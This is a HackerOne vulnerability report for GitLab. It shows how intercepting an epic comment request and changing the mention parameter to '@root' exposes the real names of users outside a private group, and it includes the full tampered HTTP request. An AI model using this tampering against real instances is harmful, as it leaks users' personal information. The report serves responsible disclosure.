Mentioning Anyone in Comments at Private User Group Epic

HackerOne report #494726 by mehmet on 2019-02-12, assigned to estrike:

1 - Create a regular user. Let's say it's @pentest01
2 - Go to http://your-gitlab-istance/dashboard/groups and create private user group. Don't add anyone.
3 - Go to that user group and add one epic.
4 - At the bottom of the page there is a comment area where you can also mention only user in your group.
5 - Create one comment and in that comment mention yourself.
6 - Intercept the request.

POST /groups/xxxx/-/epics/1/notes HTTP/1.1  
Host: 12.0.0.236  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-Token: [REDACTED]=  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: http://12.0.0.236/groups/xxxx/-/epics/1  
Content-Length: 112  
Cookie:[REDACTED]e  
Connection: close

note%5Bnoteable_type%5D=epic&note%5Bnoteable_id%5D=1&note%5Bnote%5D=%40root&merge_request_diff_head_sha=undefined

7 - At the note[note] parameter you must see %40pentest01. Change it with %40root which means that
we are mentioning a default user who is NOT member of our private user group.

8 - Go back to your story and validate that you are seeing @root user successfully mention in your comment.
9 - Move your mouser over that mention, auto-popup will show name of that user as well.

Impact

With a known gitlab username, attackers can expose real name of users.

Attachments

Warning: Attachments received through HackerOne, please exercise caution! [REDACTED]

Edited Jul 06, 2022 by Costel Maxim